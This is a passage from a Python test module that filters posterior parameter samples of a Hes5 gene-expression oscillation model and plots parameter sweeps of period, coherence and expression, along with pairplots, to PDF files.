yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_relative_sweep_' + parameter_name + '.pdf'))
def xest_investigate_heterozygous_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = accepted_model_results[other_accepted_indices]
my_posterior_samples = my_posterior_samples[other_accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in ['mRNA_degradation_rate', 'repression_threshold']:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_relative_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
rising_coherence_indices, = np.where(my_parameter_sweep_results[:,15,4] < 0.1)
my_parameter_sweep_results = my_parameter_sweep_results[rising_coherence_indices]
these_samples = my_posterior_samples[rising_coherence_indices]
these_model_results = model_results[rising_coherence_indices]
np.set_printoptions(precision=3, suppress = True)
print(these_model_results)
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,8)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'invistigating_heterozygous_relative_sweep_' +
parameter_name + '.pdf'))
pairplot = hes5.plot_posterior_distributions( these_samples )
pairplot.axes[3,0].set_xlim(0,2)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_rising_coherence_' +
parameter_name + '.pdf'))
pairplot2 = hes5.plot_posterior_distributions( my_posterior_samples )
pairplot2.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_coherence_0.2.pdf'))
def xest_plot_low_transcription_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output', 'sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = model_results[other_accepted_indices]
# parameter_names = ['basal_transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'time_delay',
# 'mRNA_degradation_rate',
# 'protein_degradation_rate',
# 'hill_coefficient']
parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.01)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','relative_low_transcription_sweep_' + parameter_name + '.pdf'))
def xest_investigate_weird_parameter_behaviour(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_basal_transcription_rate.npy'))
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 300),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.2)))
accepted_samples = my_posterior_samples[decrease_indices]
print('number of accepted samples is')
print(len(accepted_samples))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_weird_transcription_rate_behaviour.pdf'))
def xest_investigate_where_repression_threshold_changes_period(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_repression_threshold.npy'))
my_other_indices = np.where(my_parameter_sweep_results[:,9,4]>0.1)
print('number of qualifiying samples is')
print(len(my_other_indices[0]))
my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,4]>my_parameter_sweep_results[:,9,4],
my_parameter_sweep_results[:,9,4]>0.1))
# my_indices = np.where( my_parameter_sweep_results[:,9,4]>0.2)
print('the average increase is')
print(np.mean(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the minimal increase is')
print(np.min(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the maximal increase is')
print(np.max(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the median increase is')
print(np.median(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_repression_threshold_decreases_period.pdf'))
def xest_investigate_where_protein_degradation_changes_period(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
print('number of existing samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_protein_degradation_rate.npy'))
# my_other_indices = np.where(my_parameter_sweep_results[:,9,4]>0.1)
my_other_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4]>0.1, my_parameter_sweep_results[:,9,3]<300 ))
print('number of qualifiying samples is')
print(len(my_other_indices[0]))
# my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,3]>my_parameter_sweep_results[:,9,3],
# my_parameter_sweep_results[:,9,4]>0.1))
my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,3]>my_parameter_sweep_results[:,9,3],
np.logical_and(my_parameter_sweep_results[:,9,4]>0.1, my_parameter_sweep_results[:,9,3]<300 )))
# my_indices = np.where( my_parameter_sweep_results[:,9,4]>0.2)
print('the average increase is')
print(np.mean(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the minimal increase is')
print(np.min(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the maximal increase is')
print(np.max(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
print('the median increase is')
print(np.median(my_parameter_sweep_results[:,4,3]/my_parameter_sweep_results[:,9,3]))
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_protein_degradation_decreases_period.pdf'))
def xest_investigate_where_protein_degradation_decreases_coherence(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data', 'sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy')
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
my_posterior_results = model_results[accepted_indices]
#
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_protein_degradation_rate.npy'))
my_indices = np.where( my_parameter_sweep_results[:,9,3]<300)
my_parameter_sweep_results = my_parameter_sweep_results[my_indices]
my_posterior_samples = my_posterior_samples[my_indices]
print('total number of samples is:')
print(len(my_parameter_sweep_results))
# my_indices = np.where(my_parameter_sweep_results[:,14,4]<my_parameter_sweep_results[:,9,4])
# my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,14,4]<my_parameter_sweep_results[:,9,4],
# my_parameter_sweep_results[:,9,4]>0.1))
my_indices = np.where(np.logical_not(np.logical_and(my_parameter_sweep_results[:,14,4]>my_parameter_sweep_results[:,9,4],
my_parameter_sweep_results[:,9,3]>my_parameter_sweep_results[:,14,3])))
# my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,14,4]>my_parameter_sweep_results[:,9,4],
# my_parameter_sweep_results[:,9,3]>my_parameter_sweep_results[:,14,3]))
# my_indices = np.where(np.logical_and(my_parameter_sweep_results[:,4,4]<my_parameter_sweep_results[:,9,4],
# my_parameter_sweep_results[:,9,3]<my_parameter_sweep_results[:,4,3]))
# my_indices = np.where( my_parameter_sweep_results[:,9,4]>0.2)
# my_indices = np.where( my_parameter_sweep_results[:,9,3]<300)
accepted_samples = my_posterior_samples[my_indices]
accepted_results = my_posterior_results[my_indices]
print('number of accepted samples is')
print(len(accepted_samples))
print('likelihood is')
print(len(accepted_samples)/float(len(my_parameter_sweep_results)))
print('the minimal period is')
print(np.min(accepted_results[:,2]))
print(np.max(accepted_results[:,2]))
print(np.median(accepted_results[:,2]))
print('the coherence statistics are')
print(np.min(accepted_results[:,3]))
print(np.max(accepted_results[:,3]))
print(np.median(accepted_results[:,3]))
print('the mrna statistics are')
print(np.min(accepted_results[:,4]))
print(np.max(accepted_results[:,4]))
print(np.median(accepted_results[:,4]))
pairplot = hes5.plot_posterior_distributions(accepted_samples)
pairplot.diag_axes[0].set_ylim(0,200)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_protein_degradation_decreases_coherence.pdf'))
def xest_plot_model_prediction(self):
# my_posterior_samples = prior_samples[accepted_indices]
# accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
# parameter_names = ['basal_transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'time_delay',
# 'mRNA_degradation_rate',
# 'protein_degradation_rate',
# 'hill_coefficient']
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] > 0.1,
# np.logical_or(my_parameter_sweep_results[:,4,4]>0.25,
# my_parameter_sweep_results[:,14,4]>0.25)))
# my_parameter_sweep_results[:,
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 4] > 0.2,
# my_parameter_sweep_results[:,
# 14,
# 4] > 0.2)))
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 3] < 400,
# my_parameter_sweep_results[:,
# 14,
# 3] < 400)))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_relative_parameter_variation_for_nancy(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
other_accepted_indices = np.where(my_parameter_sweep_results[:,9,3]<300)
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 300),
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.2)))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 600,
# increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 300),
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.2)))
# decrease_results = my_parameter_sweep_results[decrease_indices]
# increase_results = my_parameter_sweep_results[increase_indices]
# my_parameter_sweep_results = np.vstack((decrease_results, increase_results))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.25,
# np.logical_or(my_parameter_sweep_results[:,4,4]>0.25,
# my_parameter_sweep_results[:,14,4]>0.25)))
# my_parameter_sweep_results[:,
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 4] > 0.2,
# my_parameter_sweep_results[:,
# 14,
# 4] > 0.2)))
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 3] < 400,
# my_parameter_sweep_results[:,
# 14,
# 3] < 400)))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
# my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_relative_sweep_for_nancy_' + parameter_name + '.pdf'))
def xest_plot_bayes_factor_differences(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
parameter_names = [ 'basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
for plotting_option in ['boxes', 'samples_only']:
